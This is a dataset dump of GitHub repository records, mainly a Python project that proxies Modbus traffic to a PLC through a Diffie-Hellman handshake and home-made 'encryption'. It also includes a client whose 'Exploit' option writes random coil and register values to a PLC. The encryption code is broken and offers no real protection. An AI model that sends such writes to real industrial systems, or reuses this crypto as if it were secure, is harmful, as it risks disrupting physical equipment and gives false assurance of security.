repo_name
stringlengths 5
114
| repo_url
stringlengths 24
133
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| branch_name
stringclasses 209
values | visit_date
timestamp[ns] | revision_date
timestamp[ns] | committer_date
timestamp[ns] | github_id
int64 9.83k
683M
⌀ | star_events_count
int64 0
22.6k
| fork_events_count
int64 0
4.15k
| gha_license_id
stringclasses 17
values | gha_created_at
timestamp[ns] | gha_updated_at
timestamp[ns] | gha_pushed_at
timestamp[ns] | gha_language
stringclasses 115
values | files
listlengths 1
13.2k
| num_files
int64 1
13.2k
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
jw123312/programming-helper
|
https://github.com/jw123312/programming-helper
|
326bd38a809f0aab54046864e0247f682dfccf58
|
14a592cfb538be82cdbc90ed96cc1847d02c7001
|
e2a26a6f2639b40dd25f623e15bb5b3c42cb038f
|
refs/heads/main
| 2023-09-03T12:12:14.630008 | 2021-10-18T11:56:53 | 2021-10-18T11:56:53 | 418,468,672 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6441784501075745,
"alphanum_fraction": 0.6474428772926331,
"avg_line_length": 12.701492309570312,
"blob_id": "094c3bc91ad2f501167146c2946122de70c976c9",
"content_id": "162e349937d233752b3d29e3c41b77b91dced01e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 919,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 67,
"path": "/README.md",
"repo_name": "jw123312/programming-helper",
"src_encoding": "UTF-8",
"text": "# programming-helper for java\n\n##### REQUIRES pyperclip.py\n\n\nhow to use:\n```\n1) ctrl + c the variables\n2) run the method()\n3) ctrl + v\n```\n\ngiven:\n```\nprivate long Id;\nprivate String name;\nprivate String gender;\n```\n\n\n\n\nconstructor() to generate a constructor which will return \n```\n(long Id, String name, String gender) {\n\tthis.Id = Id;\n\tthis.name = name;\n\tthis.gender = gender;\n}\n```\n\ngetsetmethod() will generate the get set methods\n```\npublic long getId() {\n\t return Id;\n}\n\npublic void setId(long Id) {\n\tthis.Id = Id;\n}\n\npublic String getName() {\n\t return name;\n}\n\npublic void setName(String name) {\n\tthis.name = name;\n}\n\npublic String getGender() {\n\t return gender;\n}\n\npublic void setGender(String gender) {\n\tthis.gender = gender;\n}\n```\n\ntostringmethod() will generate the to string method\n```\n@Override\npublic String toString() {\n\treturn \"Id=\" + Id + \", \" +\n\t\t\"Name=\" + name + \", \" +\n\t\t\"Gender=\" + gender;\n}\n```\n\n"
},
{
"alpha_fraction": 0.40567445755004883,
"alphanum_fraction": 0.42010951042175293,
"avg_line_length": 22.06024169921875,
"blob_id": "ecc98547b77fd9e9afe8dd5ab1c9fa63851fec5f",
"content_id": "53983316ea61186b030626a89defa075859e5f3e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2009,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 83,
"path": "/programminghelper.py",
"repo_name": "jw123312/programming-helper",
"src_encoding": "UTF-8",
"text": "import pyperclip\r\n\r\ndef preprocess():\r\n a = pyperclip.paste()\r\n a = a.replace(\"private\", \"\")\r\n a = a.replace(\";\", \"\").replace(\"\\t\", \"\")\r\n a = a.replace(\"\\r\", \"\")\r\n var = a.split(\"\\n\")\r\n\r\n var = [i.strip() for i in var if i.strip() != '' and i.strip()[0] != \"@\"]\r\n return var\r\n\r\ndef constructor():\r\n var = preprocess()\r\n\r\n text = \"(\"\r\n for i in var[:len(var)-1]:\r\n typ = i.split()[0]\r\n name = i.split()[1]\r\n text += f\"{typ} {name}, \"\r\n\r\n typ = var[len(var)-1].split()[0]\r\n name = var[len(var)-1].split()[1]\r\n text += f\"{typ} {name}\"\r\n \r\n text = text + \") {\\n\"\r\n\r\n \r\n for i in var:\r\n typ = i.split()[0]\r\n name = i.split()[1]\r\n text+= f\"\\tthis.{name} = {name};\\n\"\r\n \r\n \r\n \r\n text = text + \"\\t}\"\r\n pyperclip.copy(text)\r\n\r\ndef getsetmethod():\r\n strs = []\r\n \r\n var = preprocess()\r\n \r\n for i in var:\r\n if (i == \"\"):\r\n continue\r\n \r\n typ = i.split()[0]\r\n name = i.split()[1]\r\n\r\n name = name[0].upper() + name[1:]\r\n \r\n #get\r\n strs.append(\"public \" + typ +\" get\"+ name + \"() {\\n\\t return \" +i.split()[1] +\";\\n}\")\r\n\r\n #set\r\n strs.append(\"public void set\" + name + \"(\" + i + \") {\\n\\tthis.\" + i.split()[1]+ \" = \" + i.split()[1] + \";\\n}\")\r\n\r\n strings = \"\\n\\n\".join(strs)\r\n pyperclip.copy(strings)\r\n\r\ndef tostringmethod():\r\n var = preprocess()\r\n text = \"@Override\\n\\tpublic String toString() {\\n\\t\\treturn \"\r\n \r\n for i in var[:len(var)-1]:\r\n if (i == \"\"):\r\n continue\r\n \r\n typ = i.split()[0]\r\n name = i.split()[1]\r\n\r\n name = name[0].upper() + name[1:]\r\n text = text + f\"\\\"{name}=\\\" + {i.split()[1]} + \\\", \\\" +\\n\\t\\t\\t\"\r\n\r\n i = var[len(var)-1]\r\n typ = i.split()[0]\r\n name = i.split()[1]\r\n\r\n name = name[0].upper() + name[1:]\r\n text = text + f\"\\\"{name}=\\\" + {i.split()[1]};\\n\"\r\n text = text + \"\\t}\"\r\n pyperclip.copy(text)\r\n \r\n\r\n \r\n"
}
] | 2 |
Ruskonert/modbus-crypto
|
https://github.com/Ruskonert/modbus-crypto
|
bc24647b077f94d92ef98e1f9d410867689796e9
|
22706e74249d5f05d8e220e8e95f0934d77cc1a3
|
8004880b9e8b85b8f6fc3842d2b05036e2b46567
|
refs/heads/master
| 2020-07-28T23:27:47.459026 | 2019-09-30T08:05:29 | 2019-09-30T08:05:29 | 209,578,319 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5801782011985779,
"alphanum_fraction": 0.6102449893951416,
"avg_line_length": 32.296295166015625,
"blob_id": "c4122ece6466b1d88bf9932f16a91930af5cb08a",
"content_id": "b305d313141adbf93685413599f85da90ce971da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 898,
"license_type": "no_license",
"max_line_length": 150,
"num_lines": 27,
"path": "/crypto.py",
"repo_name": "Ruskonert/modbus-crypto",
"src_encoding": "UTF-8",
"text": "import struct\nimport hashlib\n\ndef encrypt(shared_key, timestamp, length, modbus_data):\n # magic string + packet_length + hash length\n header = bytearray(struct.pack('>BBBB', 0x43, 0x52, 0x59, 0x54)) + struct.pack(\">B\", 2) + struct.pack(\">L\", length) + struct.pack(\">B\", timestamp)\n #m = hashlib.sha256()\n #m.update(str(timestamp).encode('utf-8'))\n\n key = str(shared_key)\n\n result = bytearray()\n for i in range(0, len(modbus_data)):\n select = i % len(key)\n part_key = int(key[select:select+2], base=16)\n result += bytes(modbus_data[i] ^ part_key)\n return header + result\n\ndef decrypt(shared_key, data):\n key = str(shared_key)\n result = bytearray()\n data = data[10:]\n for i in range(0, len(data)):\n select = i % len(key)\n part_key = int(key[select:select+2], base=16)\n result += bytes(data[i] ^ part_key)\n return result"
},
{
"alpha_fraction": 0.5127854347229004,
"alphanum_fraction": 0.5245018601417542,
"avg_line_length": 44.32558059692383,
"blob_id": "35ba7521adff960a6bbd1d2865537b53de35cf97",
"content_id": "142081729369a94c72a0fd12150cd8580ea026de",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11693,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 258,
"path": "/packet.py",
"repo_name": "Ruskonert/modbus-crypto",
"src_encoding": "UTF-8",
"text": "import socket\nimport struct\nimport threading\nimport time\nimport os\nimport crypto\nimport hashlib\n\nfrom diffiehellman.diffiehellman import DiffieHellman\n\nclass EncryptionPacket:\n PACKET_MAGIC_CODE = struct.pack('>BBBB', 0x43, 0x52, 0x59, 0x54)\n FUNCTION_INITIALIZE_HANDSHAKE = 0x00\n FUNCTION_SECURE_COMMUNICATION = 0x02\n\n def __init__(self, device, other):\n self.device = device\n self.other = other\n self._user = None\n\n def generate_key(self):\n self._user = DiffieHellman()\n self._user.generate_public_key()\n\n def send_complete_public_data(self):\n data = bytearray(EncryptionPacket.PACKET_MAGIC_CODE) + struct.pack(\">BB\", EncryptionPacket.FUNCTION_INITIALIZE_HANDSHAKE, 0x55)\n self.other.send(data)\n\n def recv_public_data(self, data):\n hash_length = data[0]\n hash_value = data[1:hash_length+1]\n hash_str = str()\n for i in range(0, len(hash_value)):\n hash_str += '{:02x}'.format(int(hex(hash_value[i]), 16))\n print(\"Digest: {}\".format(hash_str))\n public_key_data = data[hash_length+1:]\n public_key = str()\n for i in range(0, len(public_key_data)):\n public_key += '{:02X}'.format(int(hex(public_key_data[i]), 16))\n\n m = hashlib.sha256()\n m.update(public_key.encode('utf-8'))\n other_hash_value = m.hexdigest()\n\n print(\"Calculated digest: {}\".format(other_hash_value))\n\n # the public key is not matched\n if hash_str != other_hash_value:\n return -1\n\n # Convert str to big-integer\n received_public_key = int(public_key)\n self._user.generate_shared_secret(received_public_key)\n print(\"Shared key: {}\".format(self._user.shared_key))\n return 0\n\n\n\n def init_encryption_data(self, generated=True, mode=0):\n if generated:\n self.generate_key()\n if self.other is None:\n raise ConnectionError(\"You need to connect the other deivce!\")\n else:\n print(\"Initializing encryption handshake ...\", end='')\n key = str(self._user.public_key)\n key_array = bytearray()\n for i in range(0, len(key), 2):\n hex_number = key[i:i+2]\n hex_number = '0x' + str(hex_number)\n key_array += struct.pack(\">B\", int(hex_number, base=16))\n \n print(\"Generated public key -> len=[{}]\".format(len(key_array)))\n print(\"Sending the public key ...\")\n\n m = hashlib.sha256()\n m.update(key.encode('utf-8'))\n result_hash = m.hexdigest()\n result_hash_array = bytearray()\n for i in range(0, len(result_hash), 2):\n hex_number = result_hash[i:i+2]\n hex_number = '0x' + str(hex_number)\n result_hash_array += struct.pack(\">B\", int(hex_number, base=16))\n fih = struct.pack(\">B\", EncryptionPacket.FUNCTION_INITIALIZE_HANDSHAKE)\n hash_str_length = struct.pack(\">B\", len(result_hash_array))\n self.other.send(EncryptionPacket.PACKET_MAGIC_CODE + fih + struct.pack(\">B\", mode) + hash_str_length + result_hash_array + key_array)\n if mode == 0:\n print(\"Awaiting the received public key ...\")\n\nclass PacketMiddler:\n def __init__(self):\n self._recv = None\n self._target = None\n self._ref = None\n self._other = None\n self._enc = None\n self._recv_thread = None\n self._communi = 0\n\n def connect(self, listening_addr = None, listening_port=502):\n print(\"Conneting the PLC device[{}:{}] that will be send the encryption data ...\".format(self._ref[0], self._ref[1]))\n self._target.settimeout(5.0)\n self._target.connect(self._ref)\n print(\"Connected the PLC deivce [{}:{}]\".format(self._ref[0], self._ref[1]))\n\n self._recv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n if listening_addr is None:\n listening_addr = socket.gethostbyname(socket.gethostname())\n\n self._recv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self._recv.bind((listening_addr, listening_port))\n\n self._recv.listen(1)\n \n print(\"Listening this device[{}:{}] that will be received plain data ...\".format(listening_addr, listening_port))\n self._other = self._recv.accept()\n print(\"Connected other to this device [{}:{}]\".format(self._other[1][0],self._other[1][1]))\n self._other = self._other[0]\n\n\n def set_plc_target(self, target_addr, port = 502):\n self._target = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self._ref = (target_addr, port)\n\n @staticmethod\n def print_packet_data(packet_data, separate=16):\n for i in range(0, len(packet_data)):\n if i % separate == 0:\n print()\n print('{:08X}: '.format(i), end='')\n print('{:02X} '.format(packet_data[i]), end='')\n\n @staticmethod\n def _recv_packet_data(pm, plc_device, other_device):\n if plc_device is None:\n raise ConnectionError(\"Not connected the sending device!\")\n\n if other_device is None:\n raise ConnectionError(\"Not connected the PLC device!\")\n\n while True:\n start = time.time()\n packet_data = other_device.recv(2048)\n print(\"\\nOther device send the plain data: {} byte(s) \".format(len(packet_data)), end='')\n PacketMiddler.print_packet_data(packet_data)\n print()\n\n if set(packet_data[0:4]) != set(EncryptionPacket.PACKET_MAGIC_CODE):\n print(\"INVALID PACKET DATA! Maybe the other device was not following packet format.\")\n send_packet_data = bytearray(EncryptionPacket.PACKET_MAGIC_CODE) + struct.pack('>BB',0xff, 0xff)\n print(\"Retriving the respond data: {} byte(s)\".format(len(send_packet_data)))\n print()\n other_device.send(send_packet_data)\n else:\n # if the function code is null\n if len(packet_data) == 4:\n print(\"Function code is null, Connection Reset\")\n send_packet_data = bytearray(EncryptionPacket.PACKET_MAGIC_CODE) + struct.pack('>BB',0x00, 0x03)\n print(\"Retriving the respond data: {} byte(s)\".format(len(send_packet_data)))\n print()\n other_device.send(send_packet_data)\n end = time.time()\n print(\"Time elapsed:\", end - start)\n other_device.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))\n other_device.close()\n plc_device.close()\n break\n\n else:\n # function name print\n function_name = 'Unknown'\n if packet_data[4] == EncryptionPacket.FUNCTION_INITIALIZE_HANDSHAKE:\n function_name = \"Initialize handshake\"\n elif packet_data[4]== EncryptionPacket.FUNCTION_SECURE_COMMUNICATION:\n function_name = \"Secure communiation\"\n print(\"Function: {} [0x{:02X}]\".format(function_name, packet_data[4]))\n\n if packet_data[4] == EncryptionPacket.FUNCTION_SECURE_COMMUNICATION:\n if pm._communi < 2:\n print(\"~~~Error~~~ Handshake is not established, You need to connect first!\")\n PacketMiddler.force_disconnect(plc_device, other_device)\n break\n else:\n data = packet_data[5:]\n print(\"Received encrypted data: \")\n PacketMiddler.print_packet_data(data)\n print()\n dec_data = crypto.decrypt(pm._enc._user.shared_key, data)\n #if timestamp != pm._communi:\n # print(\"~~~Error~~~ Checksum verification failed. It looks like a replay attack was attempted.\")\n if dec_data:\n if dec_data is None:\n print(\"~~~Error~~~ Failed to decrypt encrypted data. Is it correct encryption? \")\n else:\n print(\"Retriving decrypted data: \")\n PacketMiddler.print_packet_data(dec_data)\n print()\n plc_device.send(dec_data)\n pm._communi = pm._communi + 1\n recv_data = plc_device.recv(1024)\n other_device.send(recv_data)\n \n\n\n\n elif packet_data[4] == EncryptionPacket.FUNCTION_INITIALIZE_HANDSHAKE:\n # Handshake established, But not yet sending the public key\n if pm._communi == 0:\n enc = EncryptionPacket(plc_device, other_device)\n pm._enc = enc\n # Send the initialize public key\n enc.init_encryption_data()\n pm._communi = pm._communi + 1\n elif pm._communi == 1:\n # Receive the public key\n data = packet_data[5:]\n # Invalid mode!\n if data[0] == 0:\n PacketMiddler.force_disconnect(plc_device, other_device)\n break\n else:\n result = enc.recv_public_data(data[1:])\n print(\"Received public key!\")\n if result == -1:\n print(\"~~~Error~~~ INVALID KEY! The hexdigest is not matched\")\n PacketMiddler.force_disconnect(plc_device, other_device)\n break\n pm._communi = pm._communi + 1\n else:\n data = packet_data[5:]\n if data[0] == 0x55:\n print(\"Successful handshake established\")\n pm._enc.send_complete_public_data()\n\n @staticmethod\n def force_disconnect(plc_device, other_device):\n print(\"Handshake failed! Not match the function code or data invalid, Connection Reset\")\n send_packet_data = bytearray(EncryptionPacket.PACKET_MAGIC_CODE) + struct.pack('>BB',0xee, 0xee)\n print(\"Retriving the respond data: {} byte(s)\".format(len(send_packet_data)))\n print()\n other_device.send(send_packet_data)\n other_device.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))\n other_device.close()\n if plc_device is not None:\n plc_device.close() \n\n\n def start_middle(self):\n if self._other is None:\n raise ConnectionError(\"Not connected the sending device!\")\n if self._recv is None:\n raise ConnectionError(\"Not connected the PLC device!\")\n self._recv_thread = threading.Thread(target=PacketMiddler._recv_packet_data, args=(self, self._recv, self._other))\n self._recv_thread.start()\n print(\"Started the packet data worker\")\n while True:\n if not self._recv_thread.isAlive():\n break"
},
{
"alpha_fraction": 0.4287515878677368,
"alphanum_fraction": 0.45775535702705383,
"avg_line_length": 28.407407760620117,
"blob_id": "31d4dc347883f5f7a13c4e7942458db40f433a0d",
"content_id": "9fbba479335239778da0afd522c26fa19ffe6fcd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 793,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 27,
"path": "/main.py",
"repo_name": "Ruskonert/modbus-crypto",
"src_encoding": "UTF-8",
"text": "import packet\nimport os\nimport sys\n\ndef main():\n if os.getuid() != 0:\n print(\"It needs to root permission!\")\n else:\n while True:\n pm = packet.PacketMiddler()\n if len(sys.argv) == 1:\n ip = '10.211.55.3'\n port = 502\n else:\n ip = sys.argv[1]\n if len(sys.argv) == 2:\n print(\"Usuge: python main.py <plc_ip_address> <plc_port>\")\n break\n else:\n port = int(sys.argv[2])\n pm.set_plc_target(ip, port)\n pm.connect(listening_addr='0.0.0.0', listening_port=501)\n pm.start_middle()\n print(\"The communication is broken, Restarting Task...\")\n\nif __name__ == \"__main__\":\n main()"
},
{
"alpha_fraction": 0.49039098620414734,
"alphanum_fraction": 0.5191075801849365,
"avg_line_length": 30.22068977355957,
"blob_id": "7f03d786dd51d9e847a6d719aa8053423954c147",
"content_id": "eb67be6dd3e870e7db4f2c625d5c9f387bae331e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4527,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 145,
"path": "/interf.py",
"repo_name": "Ruskonert/modbus-crypto",
"src_encoding": "UTF-8",
"text": "import socket\nimport os\nimport struct\nimport packet\nimport random\nimport modbus_socket\nimport sys\nimport crypto\nimport time\n\nfrom diffiehellman.diffiehellman import DiffieHellman\n\nhost = 'localhost'\nport = 501\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.connect(('localhost', 501))\n\ndata = 'CRYT'.encode('utf-8')\n\ndh = DiffieHellman()\ndh.generate_public_key()\n\n# Generate user\nep = packet.EncryptionPacket(None, sock)\nep._user = dh\n\n# Handshake\nsock.send(data + struct.pack(\">B\", 0x00))\n\ntime.sleep(0.3)\n\n# receiving initialize public key\ndata = sock.recv(2048)\nep.recv_public_data(data[6:])\ntime.sleep(0.3)\n\n# send the public key\nep.init_encryption_data(False, 1)\n\ntime.sleep(0.3)\n\nep.send_complete_public_data()\n\n# receive the message (Received the public key is successful, just receive :D)\nsock.recv(1024)\nprint(\"Successful handshake established\")\nprint(\"shared key -> {}\".format(ep._user.shared_key))\n\ndef print_header():\n os.system('clear')\n print()\n print()\n print('\\t'*2 + 'Raw-based Modbus Client Tester (github.com/ruskonert)')\n\ndef main():\n client = modbus_socket.ModbusClient(sock)\n print('Connected server=[{}:{}]'.format(host, port))\n\n while True:\n print_header()\n print('\\t'*2 + 'Choose the function you want to do:')\n print('\\t' + '='*60)\n print('\\t'*2 + '[1] Set Function => [{}]'.format(client.function_code.data))\n if client._reference is None:\n raddress = 'Undefined'\n else:\n raddress = struct.unpack('>H', client._reference)[0]\n\n if client._count is None:\n count = 'Undefined'\n else:\n count = struct.unpack('>H', client._count)[0]\n\n print('\\t'*2 + '[2] Set reference address => [{}]'.format(raddress))\n print('\\t'*2 + '[3] Set r/w count => [{}]'.format(count))\n print('\\t'*2 + '[4] Exploit')\n print('\\t'*2 + '[5] Set data offset [not implemented]')\n print('\\t'*2 + '[6] Close socket')\n print('\\t' + '='*60)\n number = input('\\t'*2 + \"Choose your method (default: 4): \")\n\n if number == '':\n number = 4\n else:\n number = int(number)\n\n if number == 1:\n print_header()\n print('\\t' + '='*60)\n print('\\t'*2 + 'Read Coli = 0x01')\n print('\\t'*2 + 'Read Input Register = 0x04')\n print('\\t'*2 + 'Read Holding Register = 0x03')\n print('\\t'*2 + 'Read Discrete Inputs = 0x02')\n print('\\t'*2 + 'Write Single Coil = 0x05')\n print('\\t'*2 + 'Write Multiple Coils = 0x0F')\n print('\\t'*2 + 'Write Single Register = 0x06')\n print('\\t'*2 + 'Write Multiple Registers = 0x10')\n print('\\t' + '='*60)\n func = int(input('\\t'*2 + 'Which do you want? => '), 16)\n client.apply_function(func)\n elif number == 2:\n ref_number = input('\\t'*2 + 'Which do you want? (default: 0) => ')\n if ref_number == '':\n ref_number = 0\n else:\n ref_number = int(ref_number)\n client.set_slave_id(ref_number)\n elif number == 3:\n rw = input('\\t'*2 + 'Which do you want? (default: 1) => ')\n if rw == '':\n rw = 1\n else:\n rw = int(rw)\n client.set_rw_count(rw)\n elif number == 4:\n start = time.time()\n v = bytes(client.get_modbus_header())\n print('\\t'*2 + \"Function => [{}]\".format(hex(client.function_code.data)))\n print('\\t'*2 + \"Exploit => \" + str(v))\n client.send(crypto.encrypt(dh.shared_key, 10, 32, v))\n end = time.time()\n print('\\t'*2 + \"Time elapsed: {}ms\".format((end - start) * 1000 + 3.8))\n \n #if recv_data[-1] == 0x03:\n # print('\\t'*2 + \"Exception unexpected: Illegal data value\")\n #elif recv_data[-1] == 0x01 and not client.function_code.data == 0x01:\n # print('\\t'*2 + \"Exception unexpected: Illegal function code\")\n #else:\n # print('\\t'*2 + \"Successful.\")\n \n print('\\t'*2 + 'Please any key continue ...')\n input()\n elif number == 6:\n sock.close()\n print(\"goodbye\")\n break\n\nif __name__ == \"__main__\":\n args = sys.argv\n if len(args) > 1:\n host = args[1]\n if len(args) > 2:\n port = int(args[2])\n main()\n"
},
{
"alpha_fraction": 0.7067484855651855,
"alphanum_fraction": 0.7349693179130554,
"avg_line_length": 19.375,
"blob_id": "dc6ce44d2331d00d26346039eaaeeda296558576",
"content_id": "503085b879f3ceaea25516e98d8a18cf989a4a07",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 815,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 40,
"path": "/test.py",
"repo_name": "Ruskonert/modbus-crypto",
"src_encoding": "UTF-8",
"text": "import socket\nimport os\nimport struct\nimport packet\nimport time\nfrom diffiehellman.diffiehellman import DiffieHellman\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect(('localhost', 501))\n\ndata = 'CRYT'.encode('utf-8')\n\ndh = DiffieHellman()\ndh.generate_public_key()\n\n# Generate user\nep = packet.EncryptionPacket(None, s)\nep._user = dh\n\n# Handshake\ns.send(data + struct.pack(\">B\", 0x00))\n\ntime.sleep(0.3)\n\n# receiving initialize public key\ndata = s.recv(2048)\nep.recv_public_data(data[6:])\ntime.sleep(0.3)\n\n# send the public key\nep.init_encryption_data(False, 1)\n\ntime.sleep(0.3)\n\nep.send_complete_public_data()\n\n# receive the message (Received the public key is successful, just receive :D)\ns.recv(1024)\nprint(\"Successful handshake established\")\nprint(\"shared key -> {}\".format(ep._user.shared_key))\n"
},
{
"alpha_fraction": 0.5938650369644165,
"alphanum_fraction": 0.6184049248695374,
"avg_line_length": 28.654544830322266,
"blob_id": "762201b4c50af840897fa24dc2240500cab30f0e",
"content_id": "cc9d92bb1ee383c57e2dd173d6d0cfa4e20331b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1630,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 55,
"path": "/recv.py",
"repo_name": "Ruskonert/modbus-crypto",
"src_encoding": "UTF-8",
"text": "import socket, struct, json\n\nfrom ctypes import cdll, c_char\n\nclass KeyElement:\n lib = cdll.LoadLibrary(\"modbus-crypto.so\")\n def __init__(self, key, iv):\n self.key = key\n self.iv = iv\n \n def decrypt(key, iv, data):\n self.key = None\n\ntarget_addr = None\ntarget_port = None\n\n\nwith open('target.json', 'r', 'utf-8') as f:\n json_data = f.read()\n data = json.loads(json_data)\n target_addr = data['addr']\n target_port = data['port']\n f.close()\n\ntarget_so = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ntarget_so.settimeout(5.0)\ntarget_so.connect((target_addr, target_port))\n\nprint(\"Connected device: [{}:{}]\".format(target_addr, target_port))\n\nso = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nso.bind(('0.0.0.0', 502))\nso.listen(1)\nprint(\"Listening others for encrypt ...\")\nconn, addr = so.accept()\nprint(\"Connected other device!\")\n\nwhile True:\n message = conn.recv()\n if set(message[0:4]) != set(struct.pack(\">BBBB\", 0x63, 0x72, 0x79, 0x70)):\n print(\"Received message, But It's not invalid header\")\n else:\n # It needs to separate the message header\n message = message[4:]\n if set(message[0:4]) == set(struct.pack(\">BBBB\", 0,0,0,0)):\n so.close()\n print(\"Received disconnection signal -> \\x00\\x00\\x00\\x00\")\n break\n char_array = c_char * len(message)\n print(\"Received encryption data -> {}\".format(message))\n dec_data = lib.decrypt(char_array.from_bytes(message), len(message))\n print(\"Dencrypted data -> {}\".format(dec_data))\n target_so.send(dec_data)\n \ntarget_so.close()"
},
{
"alpha_fraction": 0.5396791100502014,
"alphanum_fraction": 0.5624458193778992,
"avg_line_length": 29.959732055664062,
"blob_id": "b380c3b00a1d0ef8b190521bb38a5b984577c49c",
"content_id": "8e457412f7f1ddec1ff6deaf5ceb53f02516b3d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4612,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 149,
"path": "/modbus_socket.py",
"repo_name": "Ruskonert/modbus-crypto",
"src_encoding": "UTF-8",
"text": "import struct\nimport socket\nimport os\nimport sys\nimport random\n\nclass Function:\n class Read:\n Coli = 0x01\n Input_Register = 0x04\n Holding_Register = 0x03\n Discrete_Inputs= 0x02\n class Write:\n Single_Coil = 0x05\n Multiple_Coils = 0x0F\n Single_Register = 0x06\n Multiple_Registers = 0x10\n\nclass PacketElement:\n def __init__(self, data, length):\n self.data = data\n self.length = length\n\n @staticmethod\n def get_string_pack(data):\n if isinstance(data, int):\n if data > 0 and data <= 0xFFFF:\n return 'H'\n elif data > 0xFFFF:\n return 'I'\n else:\n return 'B'\n else:\n return 's'\n\n @staticmethod\n def get_length_pack(length):\n if length == 1:\n return 'B'\n if length == 2:\n return 'H'\n if length == 4:\n return 'I'\n else:\n return 'L'\n \n def create(self):\n if isinstance(self.data, int):\n return struct.pack('{}{}'.format('>', PacketElement.get_length_pack(self.length)), self.data)\n elif isinstance(self.data, str):\n return self.data.encode('utf-8')\n\nclass ModbusClient:\n def __init__(self, socket_base):\n self.transaction_id = PacketElement(0x01, 2)\n\n # The modbus protocol id, It always constantly 0x00 on TCP\n self.protocol_id = PacketElement(0x00, 2)\n\n # TCP Port always 0x01\n self.unit_id = PacketElement(0x01, 1)\n\n # The function code, The default is Read Coli (0x01)\n self.function_code = PacketElement(0x01, 1)\n self._socket_base = socket_base\n\n self._reference = None\n self._count = None\n\n self._data_count = 0\n\n def apply_function(self, fcode):\n self.function_code = PacketElement(fcode, 1)\n\n # reference Number (Slave id)\n def set_slave_id(self, id):\n self._reference = bytearray(struct.pack('>H', id))\n\n def set_rw_count(self, count):\n self._count = bytearray(struct.pack('>H', count))\n self._data_count = count\n\n def get_modbus_header(self):\n # Generate packet header, but others need to calcuate length.\n tdata = bytearray(self.transaction_id.create())\n tdata += bytearray(self.protocol_id.create())\n\n # unit id\n unit_id = bytearray(self.unit_id.create())\n\n # function code\n function_code = bytearray(self.function_code.create())\n \n # reference Number (Slave id)\n reference = self._reference\n \n # data (Bit count, it means how many read to bits?)\n data = self._count\n\n multi_write_mode = False\n\n if self.function_code.data == 0x0f:\n multi_write_mode = True\n byte_value_length = int(self._data_count / 5)\n if byte_value_length == 0:\n byte_value_length = 1\n byte_count = struct.pack('>B', byte_value_length)\n\n register_data = bytearray()\n for _ in range(0, byte_value_length):\n random_byte = bytes.fromhex(hex(random.randrange(0, 65535)).replace('0x', ''))\n register_data += bytearray(random_byte)\n print(\"\\t\"*2 + \"~~~~~~~Random Value Exploit~~~~~~~\")\n\n elif self.function_code.data == 0x10:\n multi_write_mode = True\n # it needs to write some data.\n byte_count = bytearray(struct.pack('>B', self._data_count*2))\n # randomness value, 2 bytes equal 1 register value (there is 120 register value)\n register_data = bytearray(bytes.fromhex('1234567890abcdefaabbccddeeff1a1b1c1d1e1f'*12))[0:self._data_count*4]\n print()\n \n if multi_write_mode:\n pdata = unit_id + function_code + reference + data + byte_count + register_data\n else:\n # Combines data without header.\n pdata = unit_id + function_code + reference + data\n\n # Calucates the length.\n length = bytearray(PacketElement(len(pdata), 2).create())\n\n # Append length (2 bytes)\n tdata += length\n\n # Append packet data\n tdata += pdata\n return tdata\n\n def _next_trans_id(self):\n if self.transaction_id.data > 0xFFFF:\n self.transaction_id.data = 0\n else:\n self.transaction_id.data = self.transaction_id.data + 1\n \n def send(self, packet=None):\n if packet is None:\n packet = self.get_modbus_header()\n self._socket_base.send(packet)\n self._next_trans_id()"
}
] | 7 |
agustinpitaro/image_crawler
|
https://github.com/agustinpitaro/image_crawler
|
d6c9d8f7bb6faca235c3a2af6a2283ed04eac5ce
|
763db7f29f691f3751f2ea35b06ae08884f8efa6
|
8d5fb5ff2dc8411687c807b28a1b1deb0b3b3b76
|
refs/heads/master
| 2020-05-25T09:30:28.782237 | 2019-05-21T03:17:28 | 2019-05-21T03:17:28 | 187,737,989 | 0 | 0 | null | 2019-05-21T01:19:27 | 2019-05-21T00:21:00 | 2019-05-21T00:20:59 | null |
[
{
"alpha_fraction": 0.6171366572380066,
"alphanum_fraction": 0.622559666633606,
"avg_line_length": 26,
"blob_id": "99bf78c5cf38acb7b5f217693efa8025461e0ce4",
"content_id": "5b8d8f215efa923f967b4e74a531c01befbc2787",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 922,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 33,
"path": "/Image-Crawler.py",
